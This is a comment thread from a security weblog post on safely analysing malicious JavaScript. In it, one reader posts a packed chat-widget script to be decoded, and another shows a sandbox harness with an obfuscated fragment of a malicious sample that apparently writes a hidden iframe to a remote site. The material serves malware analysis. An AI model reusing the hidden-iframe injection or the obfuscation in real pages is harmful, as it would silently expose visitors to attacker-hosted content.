Comments on: Safely Investigating Malicious JavaScript http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/ A weblog dedicated to educating the community on security threats that matter Wed, 10 Mar 2010 17:00:15 -0500 http://wordpress.org/?v=abc hourly 1 By: Stomme poes http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/comment-page-1/#comment-237086 Stomme poes Mon, 16 Nov 2009 10:34:41 +0000 http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/#comment-237086 The JS above looks like a goofed version of PeterNed's csshover.htc. All the goofy characters are where the regexes are supposed to be. He doesn't obfu it, so someone else did (maybe passing it off as their own?). The JS above looks like a goofed version of PeterNed’s csshover.htc. All the goofy characters are where the regexes are supposed to be. He doesn’t obfu it, so someone else did (maybe passing it off as their own?).

]]> By: Ashish http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/comment-page-1/#comment-114136 Ashish Tue, 06 May 2008 07:54:31 +0000 http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/#comment-114136 hello everyone i have a problem that my javascript is encoded and i want to edit this code but i dont know how to decode it here is the code if anyone help me eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(c/a))+String.fromCharCode(c%a+161)};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[(function(e){return d[e]})];e=(function(){return'[\xa1-\xff]+'});c=1};while(c--){if(k[c]){p=p.replace(new RegExp(e(c),'g'),k[c])}}return p}('£ ´=µ Ù();£ Ç=µ Ù();£ ª=»;£ ¿=0;£ ¢´=Õ;£ ü=÷;£ ¢¹=÷;¦ ¢¯(Å){Ô(£ i ë Ç){¯(Ç[i].Å==Å)¹ Ç[i].¢Á}¹ »};¦ ø(){Ô(£ i=0;i<´.¢æ;i++)¯(´[i])´[i].°.À.Â.¢²=´[i].°.z};¦ ¸(ö,±){¯(!¢´)¹;¯(¤.Æ(ö))¤.Æ(ö).Ò=±;û ¢Ï(±)};¦ î(©){£ ¢=¡;¡.ù=©["¢µ"]?©["¢µ"]:»;¡.³=©["³"]?©["³"]:¢Ð;¡.¼=©["¼"]?©["¼"]:»;¡.w=©["Ä"]?©["Ä"]:"¢Ñ";¡.h=©["Ë"]?©["Ë"]:"¢Ò";¡.È=»;¯(¡.ù){´[0]=µ ¢¿(¡.³,¡.w,¡.h);¤.Æ(¡.ù).¥(´[0].Ó())}¡.É=¦(º){¢.¾=»;¢§{¢.¢¶(º.Þ)}¢ª(e){¸("¸","î ¢¬: "+º.Þ);¢½(¢.ê);¸("¸",e.¢Ó());¸("¸",e.¢Ô+":"+e.¢Ú);¹}¢.¾=µ Ø(¢.É);¸("¸",º.Þ);¢Õ.¢Ö=¢×()};¡.¢¶=¦(º){¯(!¢.È)¢.È=µ ¢¼(¢.³,¢.¼,¢.w,¢.h);ª=¢Ø("("+º+")");¢.È.Û();¢.¢¸()};¡.¾=µ Ø(¢.É);¡.Û=¦(){¯(¢.¾.¢Ù()==0)¢.¾.ç("½.è?å=½","ä=¢Û&¿="+¿)};¡.ê=¢Ý(¢.Û,¢.³);¡.¢¸=¦(){¯(ª.Á){Ê=0;Ô(£ i ë ª.Á){Ê=ª.Á[i].½;¯(!´[Ê])´[Ê]=µ õ(¢.³,Ê,¢.w,¢.h);¯(¿<ª.Á[i].¿)¿=ª.Á[i].¿;¯(ª.Á[i].±.ã(0,5)=="\\\\¢» "){´[Ê].à(ª.Á[i].±.ã(5))}û ´[Ê].Ü(ª.Á[i].Ì,ª.Á[i].±)}ª.Á=»}¯(¢¹&&ª.Ã){Ô(£ i ë ª.Ã){¯(¿<ª.Ã[i].¿)¿=ª.Ã[i].¿;¯(!´[0])¢ß;¯(ª.Ã[i].±.ã(0,5)=="\\\\¢» "){´[0].à(ª.Ã[i].±.ã(5))}û ´[0].Ü(ª.Ã[i].Ì,ª.Ã[i].±)}ª.Ã=»}}};¦ ¢¼(³,¼,w,h){£ ¢=¡;¡.w=w;¡.h=h;¡.³=³;¡.¼=¼;¡.ê=»;¡.ÿ=¦(){¯(!¤.Æ(¢.¼)){¢½(¢.ê);¹}¢â(¤.Æ(¢.¼).¢À)¤.Æ(¢.¼).¢ä(¤.Æ(¢.¼).¢À);¯(Ç){£ ×;£ a;£ é;Ô(£ i ë Ç){é=Ç[i];×=¤.§("×");a=¤.§("a");a.¥(¤.í(é.¢Á));a.ð("¢å","#");a.«="½";¯(ü)a.Ö=¢.þ(¢.³,é.Å);×.¥(a);¤.Æ(¢.¼).¥(×)}}};¡.þ=¦(³,Å){¹ ¦(){¯(!´[Å]){ø();´[Å]=µ õ(³,Å,¢.w,¢.h)}¹ Õ}};¡.Û=¦(){¯(ª.È){Ç=ª.È;¢.ÿ()}ª.È=»}};¦ ì(®){£ ¢=¡;¡.®=®?®:»;¡.­=¤.§("­");¡.­.«="Ñ";¡.­.ð("¢Ä","¢Å");¡.­.ð("¢Æ","­");£ À=¤.§("À");£ Ð=À.¥(¤.§("Ð"));£ ¶=Ð.¥(¤.§("¶"));£ ²=¶.¥(¤.§("²"));£ ô=¶.¥(¤.§("²"));£ ò=¶.¥(¤.§("²"));À.«="Ñ";Ð.«="Ñ";¶.«="Ñ";².«="¢Ç";ô.«="Ñ";ò.«="¢È";¡.­=ô.¥(¡.­);ò.Ö=¦(){£ ¾=µ Ø(¢.É);¾.ç("½.è?å=½","ä=¢¤&±="+¢¥(¢.­.Ý,1)+(¢.®?"&®="+¢.®:""));¢.­.Ý="";¢.­.ó();¹ Õ};¡.Î=¤.§("Î");¡.Î.«="Ñ";¡.Î.¥(À);¡.Î.¢É=¦(){£ ¾=µ Ø(¢.É);¾.ç("½.è?å=½","ä=¢¤&±="+¢¥(¢.­.Ý,1)+(¢.®?"&®="+¢.®:""));¢.­.Ý="";¢.­.ó();¹ Õ};¡.ñ=¦(){¢.­.ó()};¡.É=¦(º){º=º.Þ;¢§{¯(º)¸("¸",º)}¢ª(e){¸("¸","ì ¢¬: "+º)}};¡.Ó=¦(){¹ ¢.Î}};¦ õ(³,®,w,h){£ ¢=¡;¡.³=³;¡.®=®;¡.­=µ ì(®);¡.¢°=¢¯(®);£ ©=µ Ù();©["æ"]="¢Ê ½ ¢Ë "+¢.¢°+"";©["ï"]="½";©["Ä"]=w;©["Ë"]=h;©["¢¢"]=÷;¡.°=µ ¢£(©);¡.°.À.¢Í=¦(){ø();´[¢.®].°.À.Â.¢²++};¡.°.¢Î=¦(){¢.¾=µ Ø(¢.É);¢.¾.ç("½.è?å=½","ä=¢Ü&®="+¢.®);´[¢.®]=»};¡.¬=¡.°.¢¦(¤.§("¨"));¡.¬.Â.Ä="Ï%";¡.¬.Â.Ë="Ï%";¡.¬.Â.¢¨="¢«";¡.¬.«="¢­";¡.Ú=¦(){£ t=¤.§("À");t.Â.Ä="Ï%";t.¢±="0";t.¢³="0";£ â=t.¥(¤.§("Ð"));£ ¶=â.¥(¤.§("¶"));£ ²=¶.¥(¤.§("²"));².«="¢Þ";²=¶.¥(¤.§("²"));².«="¢·";².Ò=¢.°.æ;£ Í=¶.¥(¤.§("²"));Í.«="¢º";Í.Ö=¢.°.¢Â;£ ú=¶.¥(¤.§("²"));ú.«="¢à";ú.Ö=¢.°.¢á;¹ t};¡.°.ý(¡.Ú());¡.°.¢¡(¡.­.Ó());¡.Ü=¦(Ì,±){£ ¨;£ ·;·=¤.§("·");·.¥(¤.í(Ì+": "));·.«="¢©";¨=¤.§("¨");¨.«="¢®";¨.¥(·);¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.à=¦(±){£ ¨;¨=¤.§("¨");¨.«="¢¾";¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.°.¢ã();¡.­.ñ()};¦ ¢¿(³,w,h){£ ¢=¡;¡.³=³;¡.®=0;¡.­=µ ì(¡.®);£ ©=µ Ù();©["æ"]="¢Ã î";©["ï"]="Ã";©["Ä"]=w;©["Ë"]=h;©["¢¢"]=Õ;¡.°=µ ¢£(©);¡.¬=¡.°.¢¦(¤.§("¨"));¡.¬.Â.Ä="Ï%";¡.¬.Â.Ë="Ï%";¡.¬.Â.¢¨="¢«";¡.¬.«="¢­";¡.Ú=¦(){£ t=¤.§("À");t.Â.Ä="Ï%";t.¢±="0";t.¢³="0";£ â=t.¥(¤.§("Ð"));£ ¶=â.¥(¤.§("¶"));£ ²=¶.¥(¤.§("²"));².«="¢·";².¥(¤.í(¢.°.æ));£ Í=¶.¥(¤.§("²"));Í.«="¢º";Í.Ö=¢.°.¢Â;¹ t};¡.°.ý(¡.Ú());¡.°.¢¡(¡.­.Ó());¡.Ü=¦(Ì,±){£ ¨;£ ·;·=¤.§("·");·.¥(¤.í(Ì+": "));·.«="¢©";¨=¤.§("¨");¨.«="¢®";¨.¥(·);¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.à=¦(±){£ ¨;¨=¤.§("¨");¨.«="¢¾";¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.Ó=¦(){¢.­.ñ();¹ ¢.°.Ó()}};',95,165,'this|me|var|document|appendChild|function|createElement|div|conf|chat_data|className|cbox|input|to|if|win|msg|td|dt|chats|new|tr|span|debug|return|response|null|ulid|chat|ajax|mlid|table|pvchat|style|pchat|width|uid|getElementById|users|ulist|callback|cnum|height|from|hide|form|100|tbody|cinput|innerHTML|get|for|false|onclick|li|Ajax|Array|getHead|refresh|appendMsg|value|responseText|scrollTop|appendSysMsg|scrollHeight|tb|substr|submode|mode|topic|process|php|user|interv|in|chatInput|createTextNode|Chat|class|setAttribute|setFocus|td2|focus|td1|PrivChat|dib|true|resetChatsZ|pcid|close|else|PRIVATES|setHead|newPriv|refreshList|setFoot|drag|cssWindow|submit|escape|setBody|try|overflow|cunick|catch|auto|Error|chatbox|cumsg|getNick|toNick|cellSpacing|zIndex|cellPadding|DEBUG|pchatid|doRefresh|chattopic|refreshChats|PUBLIC|chathide|sys|UList|clearInterval|csmsg|PubChat|firstChild|nick|doHide|Public|type|text|name|ckeyb|csubmit|onsubmit|Private|with|chatTopicNick|onDragStart|cb|alert|1000|400px|300px|toString|filename|window|status|Date|eval|state|lineNumber|get_all|pvclose|setInterval|chaticon|continue|chatclose|doClose|while|show|removeChild|href|length'.split('|'),0,{})); hello everyone
i have a problem that my javascript is encoded and i want to edit this code but i dont know how to decode it here is the code if anyone help me
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”":e(c/a))+String.fromCharCode(c%a+161)};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[(function(e){return d[e]})];e=(function(){return’[\xa1-\xff]+’});c=1};while(c–){if(k[c]){p=p.replace(new RegExp(e(c),’g'),k[c])}}return p}(’£ ´=µ Ù();£ Ç=µ Ù();£ ª=»;£ ¿=0;£ ¢´=Õ;£ ü=÷;£ ¢¹=÷;¦ ¢¯(Å){Ô(£ i ë Ç){¯(Ç[i].Å==Å)¹ Ç[i].¢Á}¹ »};¦ ø(){Ô(£ i=0;i<´.¢æ;i++)¯(´[i])´[i].°.À.Â.¢²=´[i].°.z};¦ ¸(ö,±){¯(!¢´)¹;¯(¤.Æ(ö))¤.Æ(ö).Ò=±;û ¢Ï(±)};¦ î(©){£ ¢=¡;¡.ù=©["¢µ"]?©["¢µ"]:»;¡.³=©["³"]?©["³"]:¢Ð;¡.¼=©["¼"]?©["¼"]:»;¡.w=©["Ä"]?©["Ä"]:”¢Ñ”;¡.h=©["Ë"]?©["Ë"]:”¢Ò”;¡.È=»;¯(¡.ù){´[0]=µ ¢¿(¡.³,¡.w,¡.h);¤.Æ(¡.ù).¥(´[0].Ó())}¡.É=¦(º){¢.¾=»;¢§{¢.¢¶(º.Þ)}¢ª(e){¸(”¸”,”î ¢¬: “+º.Þ);¢½(¢.ê);¸(”¸”,e.¢Ó());¸(”¸”,e.¢Ô+”:”+e.¢Ú);¹}¢.¾=µ Ø(¢.É);¸(”¸”,º.Þ);¢Õ.¢Ö=¢×()};¡.¢¶=¦(º){¯(!¢.È)¢.È=µ ¢¼(¢.³,¢.¼,¢.w,¢.h);ª=¢Ø(”(”+º+”)”);¢.È.Û();¢.¢¸()};¡.¾=µ Ø(¢.É);¡.Û=¦(){¯(¢.¾.¢Ù()==0)¢.¾.ç(”½.è?å=½”,”ä=¢Û&¿=”+¿)};¡.ê=¢Ý(¢.Û,¢.³);¡.¢¸=¦(){¯(ª.Á){Ê=0;Ô(£ i ë ª.Á){Ê=ª.Á[i].½;¯(!´[Ê])´[Ê]=µ õ(¢.³,Ê,¢.w,¢.h);¯(¿<ª.Á[i].¿)¿=ª.Á[i].¿;¯(ª.Á[i].±.ã(0,5)==”\\\\¢» “){´[Ê].à(ª.Á[i].±.ã(5))}û ´[Ê].Ü(ª.Á[i].Ì,ª.Á[i].±)}ª.Á=»}¯(¢¹&&ª.Ã){Ô(£ i ë ª.Ã){¯(¿<ª.Ã[i].¿)¿=ª.Ã[i].¿;¯(!´[0])¢ß;¯(ª.Ã[i].±.ã(0,5)==”\\\\¢» “){´[0].à(ª.Ã[i].±.ã(5))}û ´[0].Ü(ª.Ã[i].Ì,ª.Ã[i].±)}ª.Ã=»}}};¦ ¢¼(³,¼,w,h){£ ¢=¡;¡.w=w;¡.h=h;¡.³=³;¡.¼=¼;¡.ê=»;¡.ÿ=¦(){¯(!¤.Æ(¢.¼)){¢½(¢.ê);¹}¢â(¤.Æ(¢.¼).¢À)¤.Æ(¢.¼).¢ä(¤.Æ(¢.¼).¢À);¯(Ç){£ ×;£ a;£ é;Ô(£ i ë Ç){é=Ç[i];×=¤.§(”×”);a=¤.§(”a”);a.¥(¤.í(é.¢Á));a.ð(”¢å”,”#”);a.«=”½”;¯(ü)a.Ö=¢.þ(¢.³,é.Å);×.¥(a);¤.Æ(¢.¼).¥(×)}}};¡.þ=¦(³,Å){¹ ¦(){¯(!´[Å]){ø();´[Å]=µ õ(³,Å,¢.w,¢.h)}¹ Õ}};¡.Û=¦(){¯(ª.È){Ç=ª.È;¢.ÿ()}ª.È=»}};¦ ì(®){£ ¢=¡;¡.®=®?®:»;¡.­=¤.§(”­”);¡.­.«=”Ñ”;¡.­.ð(”¢Ä”,”¢Å”);¡.­.ð(”¢Æ”,”­”);£ À=¤.§(”À”);£ Ð=À.¥(¤.§(”Д));£ ¶=Ð.¥(¤.§(”¶”));£ ²=¶.¥(¤.§(”²”));£ ô=¶.¥(¤.§(”²”));£ ò=¶.¥(¤.§(”²”));À.«=”Ñ”;Ð.«=”Ñ”;¶.«=”Ñ”;².«=”¢Ç”;ô.«=”Ñ”;ò.«=”¢È”;¡.­=ô.¥(¡.­);ò.Ö=¦(){£ ¾=µ Ø(¢.É);¾.ç(”½.è?å=½”,”ä=¢¤&±=”+¢¥(¢.­.Ý,1)+(¢.®?”&®=”+¢.®:”"));¢.­.Ý=”";¢.­.ó();¹ Õ};¡.Î=¤.§(”Δ);¡.Î.«=”Ñ”;¡.Î.¥(À);¡.Î.¢É=¦(){£ ¾=µ Ø(¢.É);¾.ç(”½.è?å=½”,”ä=¢¤&±=”+¢¥(¢.­.Ý,1)+(¢.®?”&®=”+¢.®:”"));¢.­.Ý=”";¢.­.ó();¹ Õ};¡.ñ=¦(){¢.­.ó()};¡.É=¦(º){º=º.Þ;¢§{¯(º)¸(”¸”,º)}¢ª(e){¸(”¸”,”ì ¢¬: “+º)}};¡.Ó=¦(){¹ ¢.Î}};¦ õ(³,®,w,h){£ ¢=¡;¡.³=³;¡.®=®;¡.­=µ ì(®);¡.¢°=¢¯(®);£ ©=µ Ù();©["æ"]=”¢Ê ½ ¢Ë “+¢.¢°+”";©["ï"]=”½”;©["Ä"]=w;©["Ë"]=h;©["¢¢"]=÷;¡.°=µ ¢£(©);¡.°.À.¢Í=¦(){ø();´[¢.®].°.À.Â.¢²++};¡.°.¢Î=¦(){¢.¾=µ Ø(¢.É);¢.¾.ç(”½.è?å=½”,”ä=¢Ü&®=”+¢.®);´[¢.®]=»};¡.¬=¡.°.¢¦(¤.§(”¨”));¡.¬.Â.Ä=”Ï%”;¡.¬.Â.Ë=”Ï%”;¡.¬.Â.¢¨=”¢«”;¡.¬.«=”¢­”;¡.Ú=¦(){£ t=¤.§(”À”);t.Â.Ä=”Ï%”;t.¢±=”0″;t.¢³=”0″;£ â=t.¥(¤.§(”Д));£ ¶=â.¥(¤.§(”¶”));£ ²=¶.¥(¤.§(”²”));².«=”¢Þ”;²=¶.¥(¤.§(”²”));².«=”¢·”;².Ò=¢.°.æ;£ Í=¶.¥(¤.§(”²”));Í.«=”¢º”;Í.Ö=¢.°.¢Â;£ ú=¶.¥(¤.§(”²”));ú.«=”¢à”;ú.Ö=¢.°.¢á;¹ t};¡.°.ý(¡.Ú());¡.°.¢¡(¡.­.Ó());¡.Ü=¦(Ì,±){£ ¨;£ ·;·=¤.§(”·”);·.¥(¤.í(Ì+”: “));·.«=”¢©”;¨=¤.§(”¨”);¨.«=”¢®”;¨.¥(·);¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.à=¦(±){£ ¨;¨=¤.§(”¨”);¨.«=”¢¾”;¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.°.¢ã();¡.­.ñ()};¦ ¢¿(³,w,h){£ ¢=¡;¡.³=³;¡.®=0;¡.­=µ ì(¡.®);£ ©=µ Ù();©["æ"]=”¢Ã î”;©["ï"]=”Ô;©["Ä"]=w;©["Ë"]=h;©["¢¢"]=Õ;¡.°=µ ¢£(©);¡.¬=¡.°.¢¦(¤.§(”¨”));¡.¬.Â.Ä=”Ï%”;¡.¬.Â.Ë=”Ï%”;¡.¬.Â.¢¨=”¢«”;¡.¬.«=”¢­”;¡.Ú=¦(){£ t=¤.§(”À”);t.Â.Ä=”Ï%”;t.¢±=”0″;t.¢³=”0″;£ â=t.¥(¤.§(”Д));£ ¶=â.¥(¤.§(”¶”));£ ²=¶.¥(¤.§(”²”));².«=”¢·”;².¥(¤.í(¢.°.æ));£ Í=¶.¥(¤.§(”²”));Í.«=”¢º”;Í.Ö=¢.°.¢Â;¹ t};¡.°.ý(¡.Ú());¡.°.¢¡(¡.­.Ó());¡.Ü=¦(Ì,±){£ ¨;£ ·;·=¤.§(”·”);·.¥(¤.í(Ì+”: “));·.«=”¢©”;¨=¤.§(”¨”);¨.«=”¢®”;¨.¥(·);¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.à=¦(±){£ ¨;¨=¤.§(”¨”);¨.«=”¢¾”;¨.Ò+=±;¢.¬.¥(¨);¢.¬.ß=¢.¬.á};¡.Ó=¦(){¢.­.ñ();¹ ¢.°.Ó()}};’,95,165,’this|me|var|document|appendChild|function|createElement|div|conf|chat_data|className|cbox|input|to|if|win|msg|td|dt|chats|new|tr|span|debug|return|response|null|ulid|chat|ajax|mlid|table|pvchat|style|pchat|width|uid|getElementById|users|ulist|callback|cnum|height|from|hide|form|100|tbody|cinput|innerHTML|get|for|false|onclick|li|Ajax|Array|getHead|refresh|appendMsg|value|responseText|scrollTop|appendSysMsg|scrollHeight|tb|substr|submode|mode|topic|process|php|user|interv|in|chatInput|createTextNode|Chat|class|setAttribute|setFocus|td2|focus|td1|PrivChat|dib|true|resetChatsZ|pcid|close|else|PRIVATES|setHead|newPriv|refreshList|setFoot|drag|cssWindow|submit|escape|setBody|try|overflow|cunick|catch|auto|Error|chatbox|cumsg|getNick|toNick|cellSpacing|zIndex|cellPadding|DEBUG|pchatid|doRefresh|chattopic|refreshChats|PUBLIC|chathide|sys|UList|clearInterval|csmsg|PubChat|firstChild|nick|doHide|Public|type|text|name|ckeyb|csubmit|onsubmit|Private|with|chatTopicNick|onDragStart|cb|alert|1000|400px|300px|toString|filename|window|status|Date|eval|state|lineNumber|get_all|pvclose|setInterval|chaticon|continue|chatclose|doClose|while|show|removeChild|href|length’.split(’|'),0,{}));

]]> By: Jose Nazario http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/comment-page-1/#comment-31 Jose Nazario Tue, 02 May 2006 14:33:16 +0000 http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/#comment-31 WordPress has a tendency to completely screw up technical content. i can't say i like this software in the least, layout and content get munged. contact me directly and i'll forward you a flat text representation of this technique. it's all cut and paste from actual investigations, so i know it works. jose _at_ arbor DOT net WordPress has a tendency to completely screw up technical content. i can’t say i like this software in the least, layout and content get munged.

contact me directly and i’ll forward you a flat text representation of this technique. it’s all cut and paste from actual investigations, so i know it works.

jose _at_ arbor DOT net

]]> By: Jordan Wiens http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/comment-page-1/#comment-28 Jordan Wiens Mon, 01 May 2006 12:56:55 +0000 http://asert.arbornetworks.com/2006/04/safely-investigating-malicious-javascript/#comment-28 Running 0.2.5 NGS-JS, I'm not getting the same verbose error messages you are. Just generic "syntax error" messages. A quick look through the man pages didn't show any obvious verbosity that changed the error reporting type. Additionally, while the vanilla code without the obfuscated code works fine, when I add that in, I get a syntax error. Any ideas? I've copied and pasted a couple of times to make sure I didn't fat finger something. $ js mal.js js: evaluation of file `mal.js' failed: mal.js:7: syntax error Where mal.js: function MyDoc() { function write(text) { print(text); } } document=new MyDoc(); (ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq; 0usvtu5gsff/xt0@je>joefy31(?=0jgsbnf?#*>> (Incidentally, I'm not sure what html will work in comments, so we'll see how much of this makes it through as a comment) Running 0.2.5 NGS-JS, I’m not getting the same verbose error messages you are. Just generic “syntax error” messages. A quick look through the man pages didn’t show any obvious verbosity that changed the error reporting type. Additionally, while the vanilla code without the obfuscated code works fine, when I add that in, I get a syntax error.

Any ideas? I’ve copied and pasted a couple of times to make sure I didn’t fat finger something.

$ js mal.js
js: evaluation of file `mal.js’ failed:
mal.js:7: syntax error

Where mal.js:
function MyDoc() {
function write(text) {
print(text);
}
}
document=new MyDoc();
(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;
0usvtu5gsff/xt0@je>joefy31(?=0jgsbnf?#*>>

(Incidentally, I’m not sure what html will work in comments, so we’ll see how much of this makes it through as a comment)

]]>